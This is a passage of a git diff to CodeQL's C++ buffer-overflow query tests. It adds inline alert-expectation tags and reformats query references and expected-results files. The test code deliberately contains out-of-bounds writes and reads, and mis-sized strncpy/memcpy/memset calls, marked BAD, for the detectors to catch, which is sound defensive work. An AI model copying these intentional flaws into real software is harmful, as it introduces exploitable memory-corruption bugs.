/* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - SNPRINTF(data, 100, L"%s", source); + SNPRINTF(data, 100, L"%s", source); // $ Alert[cpp/badly-bounded-write] printWLine(data); delete [] data; } 
@@ -627,7 +627,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_snprintf_31_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - SNPRINTF(data, 100, L"%s", source); + SNPRINTF(data, 100, L"%s", source); // $ Alert[cpp/badly-bounded-write] printWLine(data); delete [] data; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref index 5c2bacec579f..bb308ea4b215 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-119/OverflowBuffer.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverflowBuffer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected index d91379737073..142a9b4c59e5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected @@ -1,3 +1,8 @@ +#select +| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:7:33:7:36 | **argv | overflowdestination.cpp:23:45:23:48 | **argv | provenance | | 
@@ -34,8 +39,3 @@ nodes | overflowdestination.cpp:76:30:76:32 | *src | semmle.label | *src | subpaths | overflowdestination.cpp:75:30:75:32 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:75:30:75:32 | overflowdest_test2 output argument | -#select -| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref index a4213e22fcd7..0e0d1d3792de 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref @@ -1 +1,2 @@ -Critical/OverflowDestination.ql \ No newline at end of file +query: Critical/OverflowDestination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref
index 9ff1c3b33dc5..93d88e7802a0 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref
@@ -1 +1,2 @@
-Critical/OverflowStatic.ql
\ No newline at end of file
+query: Critical/OverflowStatic.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref
index f6c962c1a7b4..18ae0f2a567b 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWrite.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWrite.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref
index 757d1592e830..ba8f6a96a1fd 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWriteFloat.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWriteFloat.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWriteFloat.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref
index bf0bf1ea7d05..3a2ef158d3d6 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected index 5c10f6e059d1..af3fa1ab7cf6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.expected @@ -1,3 +1,6 @@ +#select +| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | +| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:6:27:6:30 | **argv | main.cpp:8:34:8:37 | **argv | provenance | | 
@@ -96,6 +99,3 @@ subpaths | main.cpp:8:34:8:37 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | test_buffer_overrun.cpp:32:46:32:49 | *argv | main.cpp:8:34:8:37 | test_buffer_overrun_main output argument | | main.cpp:9:29:9:32 | **argv | tests_restrict.c:15:41:15:44 | **argv | tests_restrict.c:15:41:15:44 | **argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | | main.cpp:9:29:9:32 | *argv | tests_restrict.c:15:41:15:44 | *argv | tests_restrict.c:15:41:15:44 | *argv | main.cpp:9:29:9:32 | tests_restrict_main output argument | -#select -| tests.cpp:636:2:636:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:636:17:636:22 | *source | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | -| tests.cpp:649:2:649:7 | call to strcpy | main.cpp:6:27:6:30 | **argv | tests.cpp:649:14:649:19 | *home | This 'call to strcpy' with input from $@ may overflow the destination. | main.cpp:6:27:6:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/UnboundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp index 78f94af22cfe..6f04206359cf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/main.cpp @@ -3,7 +3,7 @@ int test_buffer_overrun_main(int argc, char **argv); int tests_restrict_main(int argc, char **argv); int tests_main(int argc, char **argv); -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source[cpp/overflow-destination] Source[cpp/unbounded-write] overflowdesination_main(argc, argv); test_buffer_overrun_main(argc, argv); tests_restrict_main(argc, argv); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp index 8b785b5a6620..5aa229610bce 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/overflowdestination.cpp @@ -27,7 +27,7 @@ int overflowdesination_main(int argc, char* argv[]) { arg1 = argv[1]; //wrong: only uses the size of the source (argv[1]) when using strncpy - strncpy(param, arg1, strlen(arg1)); + strncpy(param, arg1, strlen(arg1)); // $ Alert[cpp/bad-strncpy-size] Alert[cpp/overflow-destination] //correct: uses the size of the destination array as well strncpy(param, arg1, min(strlen(arg1), sizeof(param) -1)); 
@@ -40,17 +40,17 @@ void overflowdest_test1(FILE *f) char dest[64]; char src[128]; - fgets(src, 128, f); // GOOD (taints `src`) + fgets(src, 128, f); // GOOD (taints `src`) // $ Source[cpp/overflow-destination] memcpy(dest, src, sizeof(dest)); // GOOD - memcpy(dest, src, sizeof(src)); // BAD: size derived from the source buffer + memcpy(dest, src, sizeof(src)); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-buffer] Alert[cpp/overflow-destination] Alert[cpp/static-buffer-overflow] memcpy(dest, dest, sizeof(dest)); // GOOD } void overflowdest_test2(FILE *f, char *dest, char *src) { memcpy(dest, src, strlen(dest) + 1); // GOOD - memcpy(dest, src, strlen(src) + 1); // BAD: size derived from the source buffer + memcpy(dest, src, strlen(src) + 1); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-destination] memcpy(dest, dest, strlen(dest) + 1); // GOOD } @@ -61,7 +61,7 @@ void overflowdest_test3(FILE *f, char *dest, char *src) char *src3 = src; memcpy(dest2, src2, strlen(dest2) + 1); // GOOD - memcpy(dest2, src2, strlen(src2) + 1); // BAD: size derived from the source buffer + memcpy(dest2, src2, strlen(src2) + 1); // BAD: size derived from the source buffer // $ Alert[cpp/overflow-destination] memcpy(dest2, dest2, strlen(dest2) + 1); // GOOD } @@ -70,7 +70,7 @@ void overflowdest_test23_caller(FILE *f) char dest[64]; char src[128]; - fgets(src, 128, f); // GOOD (taints `src`) + fgets(src, 128, f); // GOOD (taints `src`) // $ Source[cpp/overflow-destination] overflowdest_test2(f, dest, src); overflowdest_test3(f, dest, src); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp index 603d868258a9..60e26aca37fe 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/tests.cpp 
@@ -20,9 +20,9 @@ void test1() char bigbuffer[20]; memcpy(bigbuffer, smallbuffer, sizeof(smallbuffer)); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(bigbuffer)); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(bigbuffer)); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(smallbuffer)); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(bigbuffer)); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(bigbuffer)); // BAD: over-write // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] } void test2() @@ -31,9 +31,9 @@ void test2() char *bigbuffer = (char *)malloc(sizeof(char) * 20); memcpy(bigbuffer, smallbuffer, sizeof(char) * 10); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(char) * 20); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(char) * 20); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(char) * 10); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(char) * 20); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(char) * 20); // BAD: over-write // $ Alert[cpp/overflow-buffer] free(bigbuffer); free(smallbuffer); @@ -47,9 +47,9 @@ void test3() bigbuffer = new char[20]; memcpy(bigbuffer, smallbuffer, sizeof(char[10])); // GOOD - memcpy(bigbuffer, smallbuffer, sizeof(char[20])); // BAD: over-read + memcpy(bigbuffer, smallbuffer, sizeof(char[20])); // BAD: over-read // $ Alert[cpp/overflow-buffer] memcpy(smallbuffer, bigbuffer, sizeof(char[10])); // GOOD - memcpy(smallbuffer, bigbuffer, sizeof(char[20])); // BAD: over-write + memcpy(smallbuffer, bigbuffer, sizeof(char[20])); // BAD: over-write // $ Alert[cpp/overflow-buffer] delete [] bigbuffer; delete [] smallbuffer; 
@@ -160,8 +160,8 @@ void test6(bool cond) for (k = 0; k <= 100; k++) { - buffer[k] = 'x'; // BAD: over-write - ch = buffer[k]; // BAD: over-read + buffer[k] = 'x'; // BAD: over-write // $ Alert[cpp/static-buffer-overflow] + ch = buffer[k]; // BAD: over-read // $ Alert[cpp/static-buffer-overflow] } } @@ -169,11 +169,11 @@ void test7() { char *names[] = {"tom", "dick", "harry"}; - printf("name: %s\n", names[-1]); // BAD: under-read + printf("name: %s\n", names[-1]); // BAD: under-read // $ Alert[cpp/overflow-buffer] printf("name: %s\n", names[0]); // GOOD printf("name: %s\n", names[1]); // GOOD printf("name: %s\n", names[2]); // GOOD - printf("name: %s\n", names[3]); // BAD: over-read + printf("name: %s\n", names[3]); // BAD: over-read // $ Alert[cpp/overflow-buffer] } void test8(int unbounded) @@ -219,16 +219,16 @@ void test9(int param) buffer4 = buffer3; memset(buffer1, 0, 32); // GOOD - memset(buffer1, 0, 33); // BAD: overrun write of buffer1 + memset(buffer1, 0, 33); // BAD: overrun write of buffer1 // $ Alert[cpp/overflow-buffer] memset(buffer2, 0, 32); // GOOD - memset(buffer2, 0, 33); // BAD: overrun write of buffer2 + memset(buffer2, 0, 33); // BAD: overrun write of buffer2 // $ Alert[cpp/overflow-buffer] memset(buffer3, 0, 32); // GOOD - memset(buffer3, 0, 33); // BAD: overrun write of buffer3 + memset(buffer3, 0, 33); // BAD: overrun write of buffer3 // $ Alert[cpp/overflow-buffer] memset(buffer4, 0, 32); // GOOD - memset(buffer4, 0, 33); // BAD: overrun write of buffer4 (buffer3) + memset(buffer4, 0, 33); // BAD: overrun write of buffer4 (buffer3) // $ Alert[cpp/overflow-buffer] memcmp(buffer1, buffer2, 32); // GOOD - memcmp(buffer1, buffer2, 33); // BAD: overrun read of buffer1, buffer2 + memcmp(buffer1, buffer2, 33); // BAD: overrun read of buffer1, buffer2 // $ Alert[cpp/overflow-buffer] } { 
@@ -236,13 +236,13 @@ void test9(int param) char *str2 = "abcdefgh"; strncpy(str1, str2, strlen(str1) + 1); // GOOD - strncpy(str1, str2, strlen(str2) + 1); // BAD: overrun write of str1 - strncpy(str2, str1, strlen(str1) + 1); // DUBIOUS (detected) + strncpy(str1, str2, strlen(str2) + 1); // BAD: overrun write of str1 // $ Alert[cpp/bad-strncpy-size] + strncpy(str2, str1, strlen(str1) + 1); // DUBIOUS (detected) // $ Alert[cpp/bad-strncpy-size] strncpy(str2, str1, strlen(str2) + 1); // BAD: overrun read of str1 [NOT REPORTED] } - memmove(global_array_6, global_array_5, 6); // BAD: overrun read of global_array_5 - memmove(global_array_5, global_array_6, 6); // BAD: overrun write of global_array_5 + memmove(global_array_6, global_array_5, 6); // BAD: overrun read of global_array_5 // $ Alert[cpp/overflow-buffer] + memmove(global_array_5, global_array_6, 6); // BAD: overrun write of global_array_5 // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] if (param > 0) { @@ -262,8 +262,8 @@ void test10() wmemset(buffer1, 0, 32); // GOOD - wmemset(buffer1, 0, 33); // BAD: overrun write of buffer1 - wmemset((wchar_t *)buffer2, 0, 32); // BAD: overrun write of buffer2 + wmemset(buffer1, 0, 33); // BAD: overrun write of buffer1 // $ Alert[cpp/overflow-buffer] + wmemset((wchar_t *)buffer2, 0, 32); // BAD: overrun write of buffer2 // $ Alert[cpp/overflow-buffer] } void test11() @@ -272,7 +272,7 @@ void test11() char *string = "Hello, world!"; memset(string, 0, 14); // GOOD - memset(string, 0, 15); // BAD: overrun write of string + memset(string, 0, 15); // BAD: overrun write of string // $ Alert[cpp/overflow-buffer] } { 
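Review bot: The known misses in this file stay as free-text remarks, so the new inline expectations do not track them: in the hunk at -236, `strncpy(str2, str1, strlen(str2) + 1); // BAD: overrun read of str1 [NOT REPORTED]` carries no tag, and the same holds for the `[NOT DETECTED]` lines in the hunks at -307, -345, -472, -595 and -663. A `MISSING:` expectation would record each false negative in the test itself and surface the change when a query starts reporting it, for example `// $ MISSING: Alert[cpp/overflow-buffer]`. Which query is meant to report each of these lines is not stated in the hunks, so the query id needs confirming per line. test9 begins and ends outside the hunk.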
@@ -282,14 +282,14 @@ void test11() buffer = new char[64]; - memset(buffer, 0, 128); // BAD: overrun write of buffer + memset(buffer, 0, 128); // BAD: overrun write of buffer // $ Alert[cpp/overflow-buffer] } { char array[10] = "123"; memset(array, 0, 10); // GOOD - memset(array, 0, 11); // BAD: overrun write of array + memset(array, 0, 11); // BAD: overrun write of array // $ Alert[cpp/overflow-buffer] } } @@ -307,11 +307,11 @@ void test12() dbuf = new char[16]; memset(&myVar, 0, sizeof(myVar)); // GOOD - memset(&myVar, 0, sizeof(myVar) + 1); // BAD: overrun write of myVar + memset(&myVar, 0, sizeof(myVar) + 1); // BAD: overrun write of myVar // $ Alert[cpp/overflow-buffer] memset(myVar.buffer, 0, 16); // GOOD memset(myVar.buffer, 0, 17); // DUBIOUS: overrun write of myVar.buffer, but not out of myVar itself [NOT DETECTED] memset(&(myVar.field), 0, sizeof(int)); // GOOD - memset(&(myVar.field), 0, sizeof(int) * 2); // BAD: overrun write of myVar.field + memset(&(myVar.field), 0, sizeof(int) * 2); // BAD: overrun write of myVar.field // $ Alert[cpp/overflow-buffer] memset(buf + 8, 0, 8); // GOOD memset(buf + 8, 0, 9); // BAD: overrun write of buf [NOT DETECTED] 
@@ -345,33 +345,33 @@ void test13(char *argArray) char *ptrArray = charArray; char *ptrArrayOffset = charArray + 1; - charArray[-1] = 1; // BAD: underrun write + charArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] charArray[0] = 1; // GOOD charArray[9] = 1; // GOOD - charArray[10] = 1; // BAD: overrun write - charArray[5] = charArray[10]; // BAD: overrun read + charArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] + charArray[5] = charArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] Alert[cpp/static-buffer-overflow] - intArray[-1] = 1; // BAD: underrun write + intArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] intArray[0] = 1; // GOOD intArray[9] = 1; // GOOD - intArray[10] = 1; // BAD: overrun write - intArray[5] = intArray[10]; // BAD: overrun read + intArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] + intArray[5] = intArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] - structArray[-1].field = 1; // BAD: underrun write + structArray[-1].field = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] structArray[0].field = 1; // GOOD structArray[9].field = 1; // GOOD - structArray[10].field = 1; // BAD: overrun write - structArray[5].field = structArray[10].field; // BAD: overrun read + structArray[10].field = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] + structArray[5].field = structArray[10].field; // BAD: overrun read // $ Alert[cpp/overflow-buffer] charArray[9] = (char)intArray[9]; // GOOD - charArray[9] = (char)intArray[10]; // BAD: overrun read + charArray[9] = (char)intArray[10]; // BAD: overrun read // $ Alert[cpp/overflow-buffer] - ptrArray[-2] = 1; // BAD: underrun write - ptrArray[-1] = 1; // BAD: underrun write + ptrArray[-2] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] + ptrArray[-1] = 1; // BAD: underrun write // $ Alert[cpp/overflow-buffer] ptrArray[0] = 1; // GOOD 
ptrArray[8] = 1; // GOOD ptrArray[9] = 1; // GOOD - ptrArray[10] = 1; // BAD: overrun write + ptrArray[10] = 1; // BAD: overrun write // $ Alert[cpp/overflow-buffer] ptrArrayOffset[-2] = 1; // BAD: underrun write [NOT DETECTED] ptrArrayOffset[-1] = 1; // GOOD (there is room for this) @@ -391,10 +391,10 @@ void test13(char *argArray) buffer1[0] = 0xFFFF; buffer1[49] = 0xFFFF; - buffer1[50] = 0xFFFF; // BAD: overrun write + buffer1[50] = 0xFFFF; // BAD: overrun write // $ Alert[cpp/overflow-buffer] buffer2[0] = 0xFFFF; buffer2[49] = 0xFFFF; - buffer2[50] = 0xFFFF; // BAD: overrun write + buffer2[50] = 0xFFFF; // BAD: overrun write // $ Alert[cpp/overflow-buffer] } } @@ -464,7 +464,7 @@ void test17(long long *longArray) { int intArray[5]; - ((char *)intArray)[-3] = 0; // BAD: underrun write + ((char *)intArray)[-3] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] } { @@ -472,14 +472,14 @@ void test17(long long *longArray) multi[5][5] = 0; // GOOD - multi[-5][5] = 0; // BAD: underrun write [INCORRECT MESSAGE] + multi[-5][5] = 0; // BAD: underrun write [INCORRECT MESSAGE] // $ Alert[cpp/overflow-buffer] multi[5][-5] = 0; // DUBIOUS: underrun write (this one is still within the bounds of the whole array) - multi[-5][-5] = 0; // BAD: underrun write [INCORRECT MESSAGE] + multi[-5][-5] = 0; // BAD: underrun write [INCORRECT MESSAGE] // $ Alert[cpp/overflow-buffer] multi[0][-5] = 0; // BAD: underrun write [NOT DETECTED] - multi[15][5] = 0; // BAD: overrun write + multi[15][5] = 0; // BAD: overrun write // $ Alert[cpp/overflow-buffer] multi[5][15] = 0; // DUBIOUS: overrun write (this one is still within the bounds of the whole array) - multi[15][15] = 0; // BAD: overrun write + multi[15][15] = 0; // BAD: overrun write // $ Alert[cpp/overflow-buffer] } } 
@@ -494,22 +494,22 @@ void test18() char *p4 = (char *)malloc(128); char *p5 = (char *)malloc(128); - p1[-1] = 0; // BAD: underrun write - p2[-1] = 0; // BAD: underrun write + p1[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] + p2[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] p2++; p2[-1] = 0; // GOOD - p3[-1] = 0; // BAD + p3[-1] = 0; // BAD // $ Alert[cpp/overflow-buffer] while (*p3 != 0) { p3 = update(p3); } p3[-1] = 0; // GOOD - p4[-1] = 0; // BAD: underrun write + p4[-1] = 0; // BAD: underrun write // $ Alert[cpp/overflow-buffer] p4++; p4[-1] = 0; // GOOD - p5[-1] = 0; // BAD + p5[-1] = 0; // BAD // $ Alert[cpp/overflow-buffer] while (*p5 != 0) { p5 = update(p5); } @@ -537,7 +537,7 @@ void test19(bool b) if (b) { - memset(p1, 0, 20); // BAD + memset(p1, 0, 20); // BAD // $ Alert[cpp/overflow-buffer] memset(p2, 0, 20); // GOOD memset(p3, 0, 20); // GOOD } @@ -559,12 +559,12 @@ void test20() // ... } - if (fread(charBuffer, sizeof(char), 101, fileSource) > 0) // BAD + if (fread(charBuffer, sizeof(char), 101, fileSource) > 0) // BAD // $ Alert[cpp/overflow-buffer] { // ... } - if (fread(charBuffer, sizeof(int), 100, fileSource) > 0) // BAD + if (fread(charBuffer, sizeof(int), 100, fileSource) > 0) // BAD // $ Alert[cpp/overflow-buffer] { // ... } @@ -587,7 +587,7 @@ void test21(bool cond) char *ptr; int i; - if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (buffer[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] ptr = buffer; if (cond) @@ -595,7 +595,7 @@ void test21(bool cond) ptr++; if (ptr[-1] == 0) { return; } // GOOD: accesses buffer[0] } else { - if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] + if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] // $ Alert[cpp/overflow-buffer] } if (ptr[-1] == 0) { return; } // BAD: accesses buffer[-1] or buffer[0] [NOT DETECTED] 
